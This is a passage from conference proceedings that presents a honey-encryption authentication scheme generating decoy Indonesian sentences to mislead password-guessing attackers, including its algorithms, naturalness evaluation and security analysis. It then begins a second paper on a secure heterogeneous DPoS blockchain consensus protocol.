selama 524 tahun (for 524 years)
membentuk (shape/form)
sejarah dunia (the history of the world)
Bigram and Sentence Frequency Analysis. Bigram and sentence frequency analysis is conducted after the corpus has been cleaned and parsed. The analysis of bigram and sentence frequency is conducted as follows: 1. Creating a lookup table between bigram to predicate (mapBigramToPredicate). MapBigramToPredicate is a lookup table for mapping bigram to the group of predicates that used the associated bigram. 2. Calculating the weight of each element of bigram. The weight of each element is calculated based on the number of predicate occurrences in the corpus. The weight is used to determine the chosen predicate during the encoding process. An example of this map is shown in Table 2.
Table 2. The map of bigram to predicate. Bigram
Predicate
Weight
‘be’
“berlangsung (last)”
3112
“membentuk (form)”
4831
3. Creating a lookup table between predicate to object (mapPredicateToObject). MapPredicateToObject is created to map each predicate with the object related to the associated predicate. An example of this map is shown in Table 3.
528
N. K. Rofiatunnajah and A. M. Barmawi
4. Creating mapBigramGroup. If a bigram is not found in any predicate, then ZWCbased rules represented by a lookup table called mapBigramGroup are used for finding the predicate. ZWC is the abbreviation of Zero Width Character that is invisible in the printed text. All bigrams are divided into three ascending groups based on their frequencies. The first and second groups are mapped into the third group by inserting a ZWC before the first letter or the second letter of bigram. The first group used one ZWC, while the second used two ZWCs. An example of this map is shown in Table 4. Table 4 is created by calculating all the bigrams’ weight in Table 2. Suppose the bigram ‘aa’ is in the first group and mapped into ‘be’ in the third group. The bigram ‘aa’ is converted into bigram ‘be’ with an additional ZWC before the first letter (which is ‘[ZWC]be’) or the second letter (which is ‘b[ZWC]e’) of ‘be’.
Table 3. The map of predicate to object Predicate
Object
Berlangsung
{“Selama 524 tahun”, “Dari pukul 07”, “Hingga sekarang”, …}
(last)
( “For 524 years”, “From 07 o’clock”, “Until now”, …)
Membentuk
{ “Sejarah dunia”, “sebuah grup”, “pasukan pengawal”, …}
(form/shape)
( “the history of the world”, “a group”, “guard forces”, …)
Name Preprocessing. Name preprocessing is conducted to parse and create a lookup table of the name corpus. This process consists of two subprocesses, the name parsing process and the syllable frequency analysis. The parsing name process is conducted to parse the name into the syllable. The syllable frequency analysis is conducted to create three lookup tables: onsetList, mapOnsetToNucleus, and mapNucleusToCoda. The name corpus used in this method consists of a collection of 7944 English names for first names [9] and 14,674 for last names [10]. Name Parsing. A syllable is a word component consisting of three parts: onset, nucleus, and coda [11]. For example, “Amanda” is parsed into three syllables ‘a’, ‘man’, and ‘da’. The syllable ‘man’ consist of ‘m’ as the onset, ‘a’ as the nucleus, and ‘n’ as the coda. Two approaches are used in the syllable parsing process: the approach through the English dictionary and the approach through the rules of consonants and vowels. The name is separated into parts based on the English word for the name that consists of English words. For example, “Harmsworth” is the last name built from two English words. Thus, “Harmsworth” is separated into “harms” and “worth”. Then, each part is parsed based on consonant and vowel rules. The process of syllabification using consonants and vowels is conducted as follows: 1. Labeling each letter into two groups: consonants and vowels.
Authentication Scheme Using Honey Sentences
529
Table 4. The map of bigram’s group Bigram
Weight
Group
Bigram pair
“aa”
0
1
“be”
“ab”
0
1
“ng”
“ac”
0
1
“uk”
“ad”
0
1
“tu”
…
…
…
…
“an”
3112
2
“be”
“er”
3112
2
“ng”
“gs”
3112
2
“uk”
“la”
3112
2
“tu”
…
…
…
“tu”
4831
3
–
“uk”
4831
3
–
“ng”
6224
3
–
“be”
7943
3
–
2. Changing the label of each letter based on the following rules: a. Silent “E”. The letter “e” is silent if “e” is placed at the end of the name and the previous letter is a consonant. The letter “e” is merged with the previous consonant and counted as one consonant. b. Grouping Vowels (diphthong). A diphthong is a condition when two or more vowels form a new sound. When there is a diphthong within a name, all vowels used are grouped into one vowel. c. Role of “Y”. The letter “y” was considered a consonant at the beginning of the labeling process. However, if the letter “y” is placed between two consonants, the label of the letter “y” is changed into vowels. d. Grouping Consonant. When two or more consonants form a new sound, the entire letters are considered one consonant. For example, “th”, “sh”, “tsk” and “ght” are considered to be one consonant. 3. Grouping the letters into one syllable consisting of onset, nucleus, and coda. Syllable grouping is focused on the vowels, which act as a nucleus. Each consonant placed between two vowels is categorized into two possibilities: a coda for the first vowels or onset for the second vowels. The decision of these possibilities is determined based on the following rules: a. One consonant between two vowels (V 1 – C 1 – V 2 ). If C1 is included in the list of consonants that are commonly used to end a syllable
530
N. K. Rofiatunnajah and A. M. Barmawi
(“th”,"sh”,"tsk”,"ph”,"ch”,"wh”,"x”), then C1 is the coda for the first vowel (V1 C1 – V2 ). For other cases, C1 is the onset for the second vowel (V1 – C1 V2 ). b. Two consonants between two vowels (V 1 – C 1 C 2 – V 2 ). C1 is the coda for V1 and C2 is the onset for V2 . c. Three Consonants between two vowels (V 1 – C 1 C 2 C 3 – V 2 ). If C1 , C2 , or a group of C1 and C2 fulfilled the consonant grouping rules, then the component is the coda for V1 . If there is no possible combination for C1 and C2 , then C1 C2 is the coda for V1 , and C3 is the onset for V2 . d. Four Consonants between two vowels (V 1 – C 1 C 2 C 3 C 4 – V 2 ). Four consonants could be located sequentially if their leading three consonants (C1 C2 C3 ) fulfilled the consonant grouping rules. The component becomes the coda for V1 . But if there are no possibilities for consonant grouping combinations and one of the four consonants is the letter “s”, the letter “s” is used as a delimiter. The consonant located before the letter “s” and the letter “s” itself is the coda for V1 , while the consonant located after the letter “s” is the onset for V2 . An example of the syllabification process is shown in Table 5. Table 5. The example of the syllabification process Name
C-V Label
Syllable
Annabelle
V.C | C.V | C.V.CC
a.n | n.a | b.e.lle
Charyl
C.V | C.V.C
ch.a | r.y.l
Harmsworth
C.V.CCC | C.V.CC
h.a.rms | w.o.rth
Hollinshed
C.V.C | C.V.C | C.V.C
h.o.l | l.i.n | sh.e.d
Syllable Frequency Analysis. After the syllabification process is completed, an analysis of syllable frequency is conducted as follows: 1. Calculating the occurrence of onset in each syllable. 2. Taking sixteen highest frequency onsets. These onsets are used for the following mapping process and saved as onsetList. 3. Creating mapOnsetToNucleus by mapping each onset into the onset–nucleus bigram. The frequency of occurrence of the bigrams is used as weight. The weight value is a randomization factor during the following encoding process. 4. Creating mapNucleusToCoda based on the method used in step three. 3.2 Sign-Up Phase Based on the discussion at the beginning of Sect. 3, the objective of the sign-up phase is to register the user password to the server. In this phase, two main concepts were used: the
Authentication Scheme Using Honey Sentences
531
Discrete Logarithm Problem (DLP) [12] and the natural language encoding algorithm. The DLP is used to calculate an irreversible value (b) that is used as secret information. The natural language encoding algorithm encodes b into a natural language sentence (S). The details of these concepts are further discussed in the following subsection. The sign-up phase (see Fig. 4) is initiated by sending a password (P) from the user to the server. P is encoded into integer x. The value of b is calculated using DLP. The server generates two numbers n and a satisfy the rules of DLP, where the gcd(a, n) = 1 and a < n. The value of b is calculated as b = ax (mod n). Then, b is encoded into the seed sentences (S) with salt = 0. The value of a, n, and S are stored in the database, and S is sent back to the user. S is used as secret messages and has to be kept securely by the user.
Fig. 4. Sign-up phase of the proposed method.
Natural Language Encoding Algorithm. Based on the discussion in the previous section, the natural language encoding algorithm is conducted to encode the value of b into a honey sentence (S). For generating the honey sentence, b is represented by bigrams. These bigrams are used to choose the associated words that form the final sentence. b is divided into a list of 8-bit chunks. Every chunk in the list is converted into a bigram representation using the hexToBigram() function. We used the generateSentence() function to generate a sentence based on the bigram list. This function is conducted by taking the first unused bigram to choose the predicate. A full sentence is generated based on the chosen predicate. The next bigram is used if there are any possibilities for it to be included in the sentence. The index position of the bigram in the chosen sentence is marked and collected to create positionList. The positionList is encoded into the name. This process is conducted using the generateName() function. The generateSentence() and generateName() functions are repeated until all of the bigrams are used. The detail of this process is shown in Algorithm 1.
532
N. K. Rofiatunnajah and A. M. Barmawi
function encode(b, salt): input : two integer b and salt. output : a list of natural languages. // This algorithm encodes an integer b to a list of natural languages based on given salt. 1. hexaGroup divide b into 8-bit chunks 2. for i = 0 to length(hexaGroup) do 3. bigrams[i] hexToBigram(hexaGroup[i]) 4. end for 5. i 0 6. while i < len(bigrams) do 7. firstBigrams bigrams [i++] 8. predicateBigrams bigrams [i++] 9. chosenSentence generateSentence(predicateBigrams, salt) 10. nextBigrams bigrams [i] 11. for word in chosenSentence do 12. if nextBigrams is in word then 13. mark nextBigrams as used 14. nextBigrams bigrams [i++] 15. end if 16. end for index of every bigram in chosenPredicate and 17. positionList chosenSentence 18. name generateName(firstBigrams, positionList) 19. 20. 21. 22.
finalSentence name + sentence finalResults finalResults + finalSentence end while return finalResults
Furthermore, the following subsection discusses four functions used in the proposed method: the hex to bigram conversion function, the sentence generation function, and the name generation function. Finally, an example of the encoding process is provided in Table 6. Hex to Bigram Conversion Function. Hex to bigram conversion function (hexToBigram()) is a function to convert 8-bit integer b into its representative list of bigrams. This function takes an 8-bit integer b as input and returns a list of bigrams. The conversion process is explained as follows: 1. Calculating i as i ≡ (bdiv26 + x ∗ 10) mod 26 with x ∈ {0, 1, 2, . . . }. All letters that are in the order of i in the alphabet list become a candidate for the first letter. Suppose b = (121)10 , then we have possible i = 4, 14, 24, and the letters are {‘e’, ‘o’, ‘y’}. All of these letters are used as the first letter of bigram. 2. Calculating j as j ≡ (b) mod 26. The letter in the order of j in the alphabet becomes the second letter. Suppose b = (121)10 , then we have j = 17, and the second letter for the bigram is ‘r’.
Authentication Scheme Using Honey Sentences
533
3. Combining every letter from the first and second steps to create a list of representative bigram. In this example, we have possibleBigrams = {‘er’, ‘or’, ‘yr’}. 4. Converting every bigram in possibleBigrams into zwcBigram using mapBigramGroup. The mapBigramGroup is already prepared and explained in the sentence preprocessing phase. Suppose ‘er’ is in the second group and converted into ‘[ZWC][ZWC]ng’ (based on Table 4). ‘or’ is in the first group and converted into ‘k[ZWC]l’. Meanwhile, ‘yr’ is in the third group, so it didn’t have to be converted into anything else. Thus, we have the final result possiblePairs = {‘[ZWC] [ZWC]ng’, ‘k[ZWC]l’, ‘yr’}. Sentence Generation Function. Sentence generation function (generateSentence()) is a function to generate an Indonesian sentence from the given list of predicate possibleBigrams. This function takes b, salt, and possibleBigrams as input and returns a sentence. The process is performed as follows: 1. For every bigram in possibleBigrams, we are retrieving all the representative predicate words from mapBigramToPredicate. The mapBigramToPredicate is a table that maps bigram to its associated predicate words. This map is already prepared in Sect. 3.1. 2. Choosing the predicate word in the pos position. Pos is computed as pos = (b + i) mod (Npredicate), where Npredicate is the number of the representative predicate words. 3. Based on the chosen predicate, we are retrieving all objects from mapPredicateToObject. The mapPredicateToObject is a lookup table that maps the predicate word to the rest of the associated sentence. This map is already prepared in Sect. 3.1. 4. Choosing the object sentence that is included in the pos position. 5. Returning the combination of chosen predicate and object sentence as the final sentence. Name Generation Function. Name generation function (generateName()) is a function to generate an English name from the given list of integers. In this method, this function is used to encode the list of bigram’s positions (positionList) in the sentence. This function takes positionList and a bigram (b) as input and returns a generated name. The process of this function is performed as follows: 1. Dividing the position in the positionList into two group: firstNamePositionList and lastNamePositionList. 2. Converting the bigram b into a part of the name and using it as the first syllable for the first name. 3. Retrieving the represented onset for every position in the separated list. The onset is chosen from the onsetList that is already prepared at the preprocessing phase in Sect. 3.1. 4. Generating a syllable for every onset in step 3 by choosing a nucleus and coda. This process is performed randomized while considering the valid condition. A set of syllables is considered valid if there is no combination between nucleus-coda or coda-onset that are listed in grouping rules.
534
N. K. Rofiatunnajah and A. M. Barmawi
5. Inserting a space between 2 consonants with the least occurrence of bigram if the length of lastNamePositionList is more than 3. 6. Returning the generated first name and last name.
Table 6. Example of encoding process using the proposed method Components
Values
b
5536026
hexa(b)
54 79 1A
hexaGroup
[0x54, 0x79, 0x1A]
bigrams
0x54: [ ‘g[ZWC]h’, ‘ng’, ‘[ZWC]ji’] 0x79: [ ‘[ZWC] [ZWC]ng’, ‘k[ZWC]l’, ‘[ZWC]ul’] 0x1A: [ ‘ba’,’t[ZWC] [ZWC]u’, ‘r[ZWC]w’]
First Loop firstBigrams
[ ‘g[ZWC]h’, ‘ng’, ‘[ZWC]ji’]
predicateBigrams
[ ‘[ZWC] [ZWC]ng’, ‘k[ZWC]l’, ‘[ZWC]ul’]
chosenSentence
me[ZWC][ZWC]ngalami diskriminasi (experienced discrimination.)
positionList
[2, −1]
onsets of name
[‘m’, ‘l’]
name
dulmoleen
finalSentence
dulmoleen me[ZWC][ZWC]ngalami diskriminasi (dulmoleen experienced discrimination.)
Second Loop firstBigrams
[ ‘ba’,’t[ZWC] [ZWC]u’, ‘r[ZWC]w’]
predicateBigrams
[]
randomized chosenSentence menyiapkan pernikahan indy (preparing for Indy’s wedding.) positionList
[−1, −1, −1]
onsets of name
[‘l’, ‘l’, ‘l’]
name
urly linlin
finalSentence
urly linlin menyiapkan pernikahan indy (urly linlin is preparing for Indy’s wedding.)
Final Results
dulmoleen me[ZWC][ZWC]ngalami diskriminasi. Urly linlin menyiapkan pernikahan indy (dulmoleen experienced discrimination. Urly linlin is preparing for Indy’s wedding.)
Authentication Scheme Using Honey Sentences
535
3.3 Login Phase The login phase is conducted to authenticate the user that tried to access the resources. First, the user sends a password (P) and a number salt to the server. Then, the server encodes the password into integer x. After encoding the password, the server retrieves a secret confirmation message S b_db from the database and decodes it into an integer bdb. The server also retrieves generated numbers a dan n to compute a DLP equation b = ax (mod n). If b and bdb are equal, then the user is eligible to log in. If a user is eligible to log in, the server continues the process by encoded b into the sentence S real with given salt. S real is sent to the user as a confirmation message. On the user’s side, a new validation sentence is generated. This process is performed by decoding the secret message into bvalid . Then, with the same salt, bvalid is encoded into the new sentence S valid . S valid supposes to be the same as S real . The user could compare both values to confirm whether he communicates with the eligible server or not. The encoding process in the login phase used the same algorithm explained in the sign-up phase in Sect. 3.2. Meanwhile, the decoding algorithm is discussed in the following subsection. The detail of the login phase is shown in Fig. 5.
Fig. 5. Login phase of the proposed method.
Decoding Algorithm. This section discussed an algorithm to decode a natural sentence (S) into an integer (b). This process is initiated by decoding the name into the positionList. Then, the bigrams are retrieved based on every position in the positionList. Finally, every bigram is decoded into the original number. The details of this algorithm are performed as follows:
536
N. K. Rofiatunnajah and A. M. Barmawi
1. Extracting the name from the sentence. 2. Decoding name into firstBigram and positionList. This process is performed by parsing the name into syllables. The syllabification is done based on the rules already explained in the preprocessing phase (Sect. 3.1). Then, decoding the first syllable into firstBigram and every syllable’s onset into positionList using a reversed onsetList map. The onsetList is a lookup table prepared in the name preprocessing phase (Sect. 3.1). 3. For every pos in the positionList, fetching the bigrams in the index pos in the sentence. 4. Reversing every bigram into their original bigram. This process is performed by counting ZWC in the bigram and generating its original bigram based on the reversed mapBigramGroup. The mapBigramGroup is a lookup table that maps every bigram and their counted ZWC into a new representative bigram. The mapBigramGroup is already prepared at the name preprocessing phase. 5. Converting every original bigram into eight-bit integer NUM. Suppose we have bigram ‘AB’ and ord(x) is a function that returns the order of the letter x in the alphabet. Then, NUM is computed using Eq. 2. NUM = i + j
(2)
where i = (ord (A) mod 10) · 26, and j = ord (B). 6. Arranging every 8-bit integer NUM consecutively into a final integer b.
4 Discussion This section discussed the performance evaluation of the proposed method to prevent against password-guessing attacks. The proposed method is evaluated by two aspects: the naturalness of the generated sentence and the security analysis against passwordguessing attacks. These aspects are further discussed in the following subsection. 4.1 Naturalness Evaluation Since the proposed method has to generate an undistinguishable confirmation message, it is evaluated by the naturalness of the generated sentence. This evaluation relied on the Indonesian grammar rules and the context relation of each word in the sentence. A sentence is considered natural if the sentence is grammatically correct and the context within the subject, predicate, and object are related. The scenario of this evaluation is conducted as follows: 1. Randomly choosing 100 passwords from the password database. The password database used in this experiment is the RockYou password list [13]. This list consists of over 32 million user passwords on the website “www.rockyou.com”. 2. Generating two random numbers (a and n) that are suitable for DLP for each password, where n is a 24-bit generated random number and a is a random number that satisfied gcd(a, n) = 1 and a < n.
Authentication Scheme Using Honey Sentences
537
3. Generating natural language sentences from each password. 4. Categorizing every generated sentence into three categories as follows: a. The sentence is grammatically correct, and the words are contextually related. b. The sentence is grammatically correct, but the words are not contextually related. c. The sentence is grammatically incorrect 5. Repeating steps 2 to 4 for three times. This step is conducted to check the fidelity of the proposed method. Based on the result shown in Fig. 6, the proposed method can create sentences that are considered natural because 80,67% of the total generated sentences are categorized as grammatically correct, and the words are contextually related. However, 3% of generated sentences are not contextually related even though the grammar is correct. This condition occurred because several sentences used a predicate that has more than one meaning and grammatical functions, such that the predicate and object are not related to the subject (e. g. The word “sampai” can be translated as a verb “arrive” or a preposition “until”). The remainder, 16,33% of the total generated sentences, are grammatically incorrect with two types of grammar errors. The first type of grammar error is when the sentence uses a non-predicate word as the predicate. This condition occurred because several nonpredicate words contain an affix “ber-” or “mer-” and are mislabeled as the predicate in the sentence preprocessing phase (as discussed in Sect. 3.1). The second type of grammar error is when the generated sentence is not complete. This condition occurred because the sentence is not correctly parsed in the preprocessing phase (as discussed in Sect. 3.1).
Fig. 6. The percentage of the experiment results for each category in every generation.
538
N. K. Rofiatunnajah and A. M. Barmawi
4.2 Security Analysis The attack scenario of the proposed method (Fig. 7) is conducted by receiving an incorrect password from the attacker (P’). The password is encoded into integer x’. The server retrieved a secret confirmation message S b_db from the database and decoded it into an integer bdb. The server also retrieved generated numbers a dan n from the database to compute a DLP equation b = ax (modn). Since the b’ and bdb are unequal, the user is not eligible to log in. Then, a random number rand is generated and a fake value of bfake is computed as bfake = ax +random (modn). bfake is encoded into a natural sentence. This sentence is sent to the intruder as a fake confirmation message (S fake ). The server also sent an alert to the administrator.
Fig. 7. Attack scenario of the proposed method.
To prevent against password-guessing attacks, the security depends on the probability of the attacker finding the correct password from all possible passwords. In the proposed method, every password is sent with a salt. Thus, the total possible password is the multiplication of the total password combination and the maximum value of the salt for each password. Total possible passwordsproposed = total password combination · maximum salt (3) Suppose the length of bits used in the password is nbits , and every bit can be a value of 1 or 0, then the total password combination in the proposed method is calculated using Eq. 4. total password combination = 2nbits
(4)
Since the salt is used to determine the order of the generated sentences, the maximum value of the salt depends on the total number of possible generated sentences for each password. Suppose every eight-bit of the password is converted into nbigram bigrams,
Authentication Scheme Using Honey Sentences
539
every bigram is mapped into npredicate predicates, and every predicate is mapped into nobject objects, then the maximum value of salt is calculated using Eq. 5. maximum salt =
nbits · nbigram · npredicate · nobject 8
(5)
By substituting the results of Eq. 4 and Eq. 5 into Eq. 3, the total possible passwords are calculated using Eq. 6. Total possible passwords = 2(nbits −3) · nbits · nbigram · npredicate · nobject
(6)
Since the attacker could not determine whether the guessed password is correct or not when he does not know the nbigram , npredicate and nobject . Thus, the probability of finding the correct password from the total possible passwords is calculated using Eq. 7. Probability to find the correct password =
1 2(nbits −3)
· nbits · nbigram · npredicate · nobject (7)
Compared to the previous methods [4, 5], the complexity of password-guessing attacks in the proposed method increases. The previous methods generate the honey message from a single word, while the proposed method generates a honey message from sentences. The previous methods have to store all possible passwords and honey messages in the database, such that the security is limited to the number of data that can be stored and costs many resources. Meanwhile, the proposed method could dynamically generate sentences from one seed sentence, such that the proposed method only needs to store one sentence. By computing the total possible passwords, the probability of finding the correct password in the proposed method is also lower than in the previous methods.
5 Conclusion and Future Research Based on the discussion in Sect. 1, this research aims to increase the security of honey encryption on authentication schemes against password-guessing attacks. This problem can be addressed by creating a honey sentence as a fake message. Instead of rejecting the unattended request, the honey sentence is sent to fool the attacker. In Mohammed’s and Jordan’s methods, all the fake messages are stored in the database and cost many resources. The fake message is also generated by a single word, such that raises the suspicion of the attacker. This research proposed an authentication scheme that generated honey sentences using the natural language. The honey sentence is dynamically generated. One password or one seed sentence could generate multiple types of sentences. The proposed method creates a honey message from sentences, such that the suspicion of the attacker is lower than Mohammed’s and Jordan’s methods that use words. The experiment result showed that 80,67% of the generated sentences are considered natural, such that the naturalness of this method is good enough and can be enhanced in future works. Furthermore, in the proposed method, the complexity of generating all possible passwords is multiplied by the number of honey sentences that can be generated,
540
N. K. Rofiatunnajah and A. M. Barmawi
such that the probability of finding the correct password from all possible passwords is lower than in Mohammed’s and Jordan’s methods. The proposed method also increased the complexity of Mohammed’s and Jordan’s methods by dynamically generating the honey message from one sentence. Consequently, the proposed method only needs to store one sentence, and the security is not limited to the number of fake messages that can be stored. For future works, this research can be improved by analyzing the context between sentences in the honey message, such that the message is contextually related when it consists of more than one sentence. In addition, another method of pre-processing and constructing honey sentences also can be conducted to enhance the naturalness of the generated sentences.
References 1. Bonneau, J., Herley, C., Van Oorschot, P.C., Stajano. F.: The quest to replace passwords: a framework for comparative evaluation of web authentication schemes. In: 2012 IEEE Symposium on Security and Privacy, pp. 553–567. IEEE, New York (2012) 2. Wang, X., Yan, Z., Zhang, R., Zhang, P.: Attacks and defenses in user authentication systems: a survey. J. Netw. Comput. Appl. 188, 103080 (2021) 3. Juels, A., Ristenpart, T.: Honey encryption: security beyond the brute-force bound. In: Nguyen, P.Q., Oswald, E. (eds.) EUROCRYPT 2014. LNCS, vol. 8441, pp. 293–310. Springer, Heidelberg (2014). https://doi.org/10.1007/978-3-642-55220-5_17 4. Kurnaz, S., et al.: Secure pin authentication in java smart card using honey encryption. In: 2020 International Congress on Human-Computer Interaction, Optimization and Robotic Applications (HORA), pp. 1–4. IEEE, New York (2020) 5. Honey Encryption. https://medium.com/smucs/honey-encryption-e56737af081c. Accessed 31 June 2022 6. Moeliono, A.M., et al.: Tata bahasa baku bahasa Indonesia, 4th edn. Badan Pengembangan dan Pembinaan Bahasa, Jakarta (2017) 7. Goldhahn, D., Eckart, T., Quasthoff, U.: Building large monolingual dictionaries at the leipzig corpora collection: from 100 to 200 languages. In: Proceedings of the 8th International Language Resources and Evaluation (LREC 2012). ELRA, Turkey (2012) 8. Kbbi, K.B.B.I.: Kamus Besar Bahasa Indonesia (KBBI). Kementerian Pendidikan Dan Budaya, Jakarta (2016) 9. Name Corpus. http://www-2.cs.cmu.edu/afs/cs/project/ai-repository/ai/areas/nlp/corpora/ names/. Accessed 31 July 2022 10. English Surnames from 1849. https://www.kaggle.com/datasets/vinceallenvince/engwalessurnames. Accessed 31 July 2022 11. Anderson, C.: Essentials of linguistics. McMaster University, Hamilton (2018) 12. McCurley, K.S.: The discrete logarithm problem. In: Proceedings of Symposium in Applied Math, pp. 49–74. AMS, Providence (1990) 13. RockYou Wordlist. https://github.com/brannondorsey/naive-hashcat/releases/download/data/ rockyou.txt. Accessed 31 July 2022
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol Using Heterogeneous Strong Designated Verifier Signature Can Zhao, XiaoXiao Wang, Zhengzhu Lu, Jiahui Wang, Dejun Wang, and Bo Meng(B) School of Computer Science, South-Central Minzu University, Wuhan, China [email protected]
Abstract. With the rapid development of blockchain, in which the nodes may use different cryptographic mechanism to achieve the secure consensus, research on a secure and heterogeneous consensus protocol is becoming a hot issue. Based on the idea of electronic voting, coercion-resistance and receipt-freeness are introduced for consensus protocol to prevent vote buying and candidate cheating. And then, a secure and heterogeneous DPoS consensus protocol using heterogeneous designated verifier signature is presented, which has authentication, secrecy, anonymity, fairness, coercion-resistance, verifiability and receipt-freeness. After that, the proposed DPoS consensus protocol is implemented on eclipse platform using the Java language. The experimental results show that the throughput and the time of producing blocks stay stable over 15–5000 of the number of nodes. Keywords: Heterogeneous designated verifier signature · DPoS consensus protocol · Coercion-resistance · Receipt-freeness
1 Introduction Consensus protocol, for example, PoW(Proof of Work) [1], PoS(Proof of Stake) [2], DPoS(Delegated Proof of Stake) [3], PoPF(Proof of Participate and Fee) [4], PBFT(Practical Byzantine Fault Tolerance) [5], Raft [6], forms the backbone of blockchain by helping all the nodes in the network verify the transactions, Among them, DPoS is widely used in the important blockchains, including BitShare [7] and EOS [8]. In 2014, Larimer [3] proposed the idea of DPoS consensus protocol, which employs stake as an evidence for voting, rather than for the opportunity to mining. In 2020, Xu [9] put forward a kind of vague set to enhance the security and fairness of DPoS consensus protocol by allowing each node to select agent node. In 2021, Liu [10] used the Probabilistic Linguistic Term Set to improve the efficiency and flexibility of DPoS consensus protocol by adding voting options for nodes. At the same year, Hu [11] designed a novel hybrid consensus mechanism by combing High Quality DPoS and an improved PBFT algorithm to enhance security of DPoS consensus protocol. However, these DPoS consensus protocols [3, 9–11] have no consideration on vote buying, candidate cheating. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 541–562, 2023. https://doi.org/10.1007/978-3-031-28073-3_38
542
C. Zhao et al.
At the same time, with the complication of applications in blockchain, the nodes may use different cryptographic to establish secure communication to achieve the consensus. These DPoS consensus protocols have no support in heterogeneous cryptography communication mechanism [12]. Hence, HSDVS-DPoS: a secure and heterogeneous DPoS consensus using the heterogeneous designated verifier signature is proposed to solve above problems. Main work of this paper are as follows: 1. Based on the ideas of electronic voting, coercion-resistance and receipt-freeness are introduced for a consensus protocol. And then, a secure and heterogeneous DPoS consensus protocol (HSDVS-DPoS) using heterogeneous designated verifier signature is presented, which has authentication, secrecy, anonymity, fairness, coercion-resistance, verifiability and receipt-freeness. 2. The HSDVS-DPoS consensus protocol is implemented on eclipse platform using the Java language. The experimental results show that the throughput and the time of producing blocks stay stable over 15–5000 of the number of nodes. The throughput decreases and producing blocks is not as efficient if the number of nodes is bigger than 5000.
2 Related Work In this section, the DPoS consensus protocol, heterogeneous blockchain and IoB are discussed. Larimer proposed the idea of DPoS in 2014, which employs stake as an evidence for voting, rather than for the opportunity to mining. In DPoS consensus protocol, these stakeholders elect witnesses by voting. A stakeholder cannot vote for more decentralization than witnesses for which they actually cast votes. Each account is allowed one vote per share per witness, this is a process known as approval voting mechanism. The top N witnesses by total approval voting are selected. The main difference between DPoS and PoS is that DPoS represents democracy. And its typical applications include BitShare and EOS. In 2018, Fan et al. [13] proposed Roll-DPoS, in which the core part of reaching the Roll-DPoS consensus is PBFT algorithm in each period. Roll-DPoS initiates a candidate pool through a community voting process with the help of the Ethereum blockchain and nodes that receive the most number of votes from the community will become the potential block producers. At the same year, Snider [14] concluded that DPoS is a method of providing security to a crypto-currency network through the approval voting of delegates, but there are some problems such as low voter turnout, bribing attack, large-scale attack, collusion of block producers, and candidate cheating and distributed denial of service attack (DDoS). In 2019, Huang et al. [15] introduced the fusing mechanism to eliminate the evil nodes in DPoS, and the credit mechanism to reduce the possibility of evil nodes. In 2021, Liu [16] adopted the K-means algorithm to select good nodes in the agent queue in advance to prevent the centralization and to reduce the probability of malicious nodes being selected in DPoS consensus protocol. In 2022, Wen [17] proposed a novel combination analysis method of DPoS consensus protocol for effectiveness. The heterogeneous blockchain mainly focus on the identity authentication of user nodes in heterogeneous blockchains under cross-chain communication, but it does not
HSDVS-DPoS: A Secure and Heterogeneous DPoS Consensus Protocol
543
involve the secure communication between different roles in the heterogeneous cryptosystem environment in consensus protocol. In 2018, Ma et al. [18] proposed a novel cross-domain authentication scheme based on blockchain technology, which has good practicability in domain authentication. In 2019, Li et al. [19] proposed the necessity and the method of constructing transaction system of multi-energy system based on heterogeneous blockchain technology in order to address the problems of blockchain constraints. At the same year, Dong et al. [20] studied the cross-domain authentication credibility of heterogeneous blockchain. IoB refers to the communication between different blockchain networks to realize the connection of services to strengthen the connection between blockchains and improve the interoperability across blockchains. In 2018, Vo et al. [21] envisioned the concept of IoB. In 2019, Li et al. [22] believed that the coexistence of different types of blockchains applications is a common phenomenon, and the cross-chain technology is an important technology for blockchains to realize interoperability and enhance scalability. At the same year, Alexei et al. [23] provided the first systematic exposition of CCC (cross-chain communication) protocols, and they show that no a trusted third party for realizing CCC is impossible. In addition, they introduced a framework for evaluating existing crosschain communication protocols and designing new ones. In 2021, Shao [24] proposed an Identity-Based Encryption based cross-chain communication mechanism of Blockchain to implement the security authentication and the cross-chain communication.
3 Preliminaries 3.1 Heterogeneous Strong Designated Signature Based on PKI and IBC A heterogeneous Strong Designated Verifier Signature (SDVS) is used in heterogeneous cryptography communication, in which the communicating parties, Alice and Bob, support different cryptographies. The signer Alice sends a signature to the receiver Bob who is the designated verifier. Only Bob can verify the validity of the signature with his secret key. A heterogeneous SDVS based on Public Key Infrastructure (PKI) and Identity-based Cryptography (IBC) [12] has correctness, non-transferability, unforgeability, strongness, source hiding, and non-delegatability. Here, we use it to develop coercion-resistance and receipt-freeness in DPoS consensus protocol. The heterogeneous SDVS based on PKI and IBC scheme is composed of five algorithms: Setup, KeyGen, SDVS Signature, SDVS Verification, and Transcript Simulation. Setup algorithm accepts a security parameter as the input and produces system parameter, master public key, and master private key. Apart from that, it publishes the system public parameters. KeyGen algorithm generates the public key and private key for the communicating parties who are in the PKI and IBC cryptosystems, respectively. SDVS Signature algorithm generates a signature for the designated verifier. SDVS Verification algorithm verifies the signature. Transcript Simulation algorithm generates signature simulation.
4 Proposed HSDVS-DPoS Consensus Protocol In order to solve vote buying, candidate cheating and no support for heterogeneous cryptography communication, based on the ideas of electronic voting, coercion-resistance
544
C. Zhao et al.
and receipt-freeness are introduced for consensus protocol. And then, a secure and heterogeneous DPoS consensus protocol using heterogeneous designated verifier signature (HDVSS-DPoS) is presented using heterogeneous strong designated Signature. The HSDVS-DPoS consensus protocol in Fig. 1 includes registration phase, voting phase, counting phase and block production phase. Heterogeneous designated verifier signature is adopted in the voting phase and the counting phase. The first phase is registration phase, in which the registration node R generates the list of witness candidate node ListW, enquires stakeholder node S’s Token using S’s address, and then sends list of stakeholder node ListS including S’s basic information to the counting node C. The second phase is voting phase, in which a stakeholder node S generates Ballot for ListW and sends it to counting node C. The third phase is counting phase, in which the counting node C counts Ballot and publishes results, signature for Ballot, and signature simulation with Ballot. The final phase is block production phase, in which Witness nodes produce block.
Fig. 1. Flowchart.
In the following, symbols, Data structure of Ballot, Rules of counting ballots, Roles, Framework and Phases are presented. 4.1 Roles The roles in Fig. 2 include ordinary node, stakeholder node, witness candidate node, witness node, block producer node, registration node and counting node. The characteristics of nodes are: 1. Ordinary node: a node in distributed network. 2. Stakeholder node: ordinary nodes who hold stake. They vote for witness candidate node in ListW. 3. Witness candidate node: the vote object of stakeholder node. The range of witness candidate nodes is stakeholder nodes.
